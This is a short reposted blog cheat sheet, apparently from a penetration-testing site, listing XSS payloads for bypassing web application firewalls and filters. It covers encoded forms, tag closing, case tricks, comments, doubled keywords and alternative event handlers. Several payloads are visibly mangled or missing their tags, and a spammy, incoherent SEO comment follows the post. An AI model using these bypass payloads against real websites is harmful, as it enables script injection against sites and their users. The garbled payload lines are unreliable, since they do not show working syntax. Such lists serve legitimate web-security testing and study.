Cross site scripting,XSS,bypass XSS filter,xss payload

Cross Site Scripting (Cross Site Scripting, XSS) is a Web application attack in the data output to the page when there is a problem, leading to an attacker can be constructed malicious data displayed in the page vulnerability. Because the cross-site scripting attacks are to the page content to write a malicious script or HTML code, so cross-site scripting vulnerability is also known as HTML injection vulnerability.

How to bypass WAF:

Encoding bypass
Hex encode: alert(‘123’)jsfuck
Url encode: %3Cimg%20src%3Dx%20onerror%3Dprompt(1)%3E
Unicode encode: +ADw-img src+AD0-x onerror+AD0-prompt(1)+AD4-

magic_quotes_gpc bypass: String.fromCharCode(97, 108, 101, 114, 116, 40, 34, 88, 83, 83, 34, 41, 59)

close tag:
“>alert(/123/)
alert(1)

Case insensitive: alert(‘123’)

use other tag: XSS
<img a=”
“onsubmit=javascript:alert(1)%20name=”a

use comment: %0aalert(1);
/**/
%00

Two-letter bypass:

alalertert(123)

Other events bypassonload
onclick
onerror
prompt
confirm
onmousemove

The post Cross site scripting (XSS) :Some techniques to bypass WAF appeared first on Penetration Testing in Linux. http://ift.tt/2pm5VF1 http://ift.tt/2aM8QhC

2 comentários sobre “Cross site scripting,XSS,bypass XSS filter,xss payload

  1. He was the co-founder and principal of GmbH (Belgium), an organization specializing in webmaster software growth, industrial-energy cloaking and a wide range
    of upmarket search engine optimization instruments and
    providers, pioneering amongst other things such benchmark merchandise because the world’s most complete database of verified search engine spiders, fully automated IP supply purposes, link constructing community administration software and
    automated personalized content material creation.

Deixar mensagem para www.icesi.edu.co Cancelar resposta